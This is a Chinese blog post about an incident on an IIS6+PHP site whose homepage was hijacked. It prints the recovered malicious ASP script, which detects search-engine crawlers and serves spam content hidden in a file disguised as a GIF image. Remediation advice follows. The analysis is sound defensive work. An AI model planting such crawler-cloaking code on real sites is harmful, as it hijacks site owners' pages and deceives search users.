阅读模式:

解决网站主页被非法篡改

查看:13839  回复:2  类型:  来源:php自学网  标签 运维 web安全

        运行环境iis6+php ,搜索引擎总是收录非法的内容,总是去不掉,而且通过ftp看不到恶意文件。

        于是通过访问index.asp(默认是去访问了index.html或index.php,而index.asp是非法上传进来的)发现了问题。

    通过php获取了这个文件的代码:

<?php
    if(file_exists('index.asp')){
        //非法默认加载的首页文件
        $file = file_get_contents('index.asp');
        //查看所有文件包括隐藏
        var_dump($file);    
    }else{
        echo '0';
    }
?>

    分析上面打印出来的分页列表,找出非法伪装成图片的恶意内容文件

//分析上面打印出来的分页列表,找出非法伪装成图片的恶意内容文件
if(file_exists('static/images/doc.gif')) {
    //输出伪装成图片的恶意代码
    $files = file_get_contents('static/images/doc.gif');
    var_dump($files);
}

        发现了恶意代码,这里的主要做了判断是不是搜索引擎访问,如果是就去加载伪装成图片的非法内容的文件,所以搜索引擎一抓去就是非法内容了,如果用的iis6+php环境,而且通过ftp看不到这些文件,建议更换服务器环境,禁用iis,更换成nginx+php环境。

//asp
string(22174) "пїњ<%
function isspider()
dim agent,searray,i agent="agent:"&LCase(request.servervariables("http_user_agent"))
searray=array("googlebot","baiduspider","sogou","yahoo","soso","360","so","yahoo","bing","sm")
isspider= false for i=0 to ubound(searray) if (instr(agent,searray(i))>0) then
isspider=true next end function function fromse()
dim urlrefer,i,searray urlrefer="refer:"&LCase(request.ServerVariables("HTTP_REFERER"))
fromse= false if urlrefer="" 
then fromse= false searray=array("google","baidu","sogou","yahoo","soso","360","so","yahoo","bing","sm")
for i=0 to ubound(searray) if (instr(urlrefer,searray(i))>0) 
then fromse=true next end function function mainpage()
dim mainindex,n,pagearray,indexquery,i mainindex=LCase(request.ServerVariables("SCRIPT_NAME"))
indexquery=LCase(request.ServerVariables("QUERY_STRING"))
mainpage= false pagearray=array("/index.","/default.","/main.")
for i=0 to ubound(pagearray)
if (instr(mainindex,pagearray(i))>0 and len(indexquery)<2)
then mainpage=true next end function if isspider() and mainpage()
then
dim mfso,mfileurl,mfilecon,wfile mfileurl=Server.MapPath("static/images/doc.gif")
Set mfso=Server.CreateObject("Scripting.FileSystemObject")
if mfso.FileExists(mfileurl)
then Set wfile=mfso.OpenTextFile(mfileurl, 1)
mfilecon=wfile.readAll response.clear
response.write(mfilecon) response.write("")
response.flush wfile.Close Set wfile=Nothing
Set mfso=Nothing response.end
else response.write("fn")
end if end
if if (fromse() and mainpage()) then response.clear
%>

        总结:从上面可以看出,服务器被非法新增了文件,并把代码进行图片伪装,而非法新增的图片和文件是通过服务器的漏洞上传进行来的,比如:文件上传功能,ftp被暴力破解等途径。所以可以通过一些记录或日志,发现蛛丝马迹,而进行分析。

解决网站主页被非法篡改:

    1.查找问题

    2.升级服务器软件

    3.修改服务器密码,修改ftp密码,更换常用的端口,或通过脚本分析登陆日志进行对登陆失败次数多的ip加黑名单操作

    4.使用360安全检测工具进行检测网站存在的漏洞,并对服务器或web程序存在的漏洞进行修复。网址:http://webscan.360.cn/*也推荐使用appscan工具进行详细扫描网站,使用方法和下载地址:https://www.jb51.net/softjc/579196.html)

    5.修复网站漏洞后,安装服务器安全软件,推荐

        云锁,网址:http://www.yunsuo.com.cn/

        安全狗,网址:http://www.safedog.cn/

开启检测和防护(也可以一开始直接进行这一步操作)。

分享到:
1 1

*有问题之处烦请在评论中指出非常感谢!
不是我想要的内容,继续搜索:

扫描二维码手机查看

最新评论:
Sine安全技术  发表于 2018-07-07 09:35:31  中国山东青岛联通
沙发
处理方法:先把可疑的文件 查看下修改时间 对比下 自己本地的备份文件 是否有多余的文件 如果有的话就删除,再看下首页有无被修改 有的话就用备份替换上传上去,但只能解决一时 还是会被反复篡改,治标不治本 建议找专业做安全的来处理解决国内也就找Sinesafe和绿盟等可以专业的处理. 回复
防爆车|冷藏车|飞翼车 回复 Sine安全技术 您好
!可以帮我解决网站主页被篡改的问题吗?
2018-07-22 11:30 中国湖北襄阳电信 回复
回复:[主题]
表情:
 提交评论
清空

发布评论:


登录:
  表情:
评论话题
推荐阅读:
TCP的三次握手(建立连接)和四次挥手(关闭连接)   阅读:4087PHP 鸟哥:我也曾经是“不适合”编程的人   阅读:15300linux时间戳有趣的情人节秒1234567890   阅读:5787php打印九九乘法表   阅读:11154crontab+shell脚本实现定时备份mysql数据库   阅读:8082centos 7 添加 redis 3.2.9 开机启动脚本   阅读:9906人性漫画:打工与创业的残酷区别   阅读:5249php冒泡排序法   阅读:14925centos 7搭建zabbix3.4   阅读:6946linux php7安装yaf扩展   阅读:8942linux命令中执行php脚本   阅读:8583javascript获取两个日期间的所有日期   阅读:7124nginx安装redis模块   阅读:6374企业让你去面试,可能不是真的招人   阅读:6202一步步带你,如何网站架构   阅读:4491什么是天使轮?什么是A轮融资?B轮融资?   阅读:5390给 centos 7 安装桌面环境   阅读:17339最新centos7 搭建LNMP环境(centos7.2+php7+mysql5.7+nginx1.11+redis3.2)   阅读:11435php 读取和设置redis的键值   阅读:7635php swoole搭建简单的聊天室   阅读:4754centos7开启交换内存   阅读:11459一键分享到QQ空间、QQ好友、新浪微博、微信代码   阅读:133024php显示刚刚、几分钟前、几小时前、几天前的函数   阅读:9051关于PHP程序员技术职业生涯规划   阅读:3193人性漫画:打工与创业的残酷区别   阅读:5249php中地址引用&的真正理解-变量引用、函数引用、对象引用   阅读:6127centos7中颁发CA证书并开启web https   阅读:8486centos 7 设置 nginx-1.11.10 开机启动   阅读:8352linux php7编译安装mongodb扩展   阅读:9364人性漫画:打工与创业的残酷区别   阅读:5249面试的时候和你谈理想,是理想or入坑?   阅读:11136最简单的Banner轮播左右切换效果代码及实现思路(附带源码)   阅读:32694shell脚本批量删除几天前的文件   阅读:10716shell脚本破解十位数内的所有纯数字rar加密压缩包脚本   阅读:9552面试都会问你为什么你从上一家公司离职的真实意思   阅读:11616php冒泡排序法   阅读:14925shell脚本统计当前服务器并发连接数   阅读:8136十张GIF让你弄懂递归等概念   阅读:6480给网站添加一键新浪微博登录的功能   阅读:6837把php session 会话保存到redis   阅读:7685php设置cookie为HttpOnly防止XSS攻击   阅读:13280mysql数据库性能的基本优化   阅读:4778centos 7 修改系统屏幕分辨率   阅读:46733小米手机端商城rem适配原理   阅读:7055TCP的三次握手(建立连接)和四次挥手(关闭连接)   阅读:4087TCP的三次握手(建立连接)和四次挥手(关闭连接)   阅读:4087javascript对cookie操作详细代码函数   阅读:5614知乎百万赞作者告诉你:年薪百万的人都在靠什么赚钱   阅读:7101给网站添加一键新浪微博登录的功能   阅读:6837linux php7安装yaf扩展   阅读:8942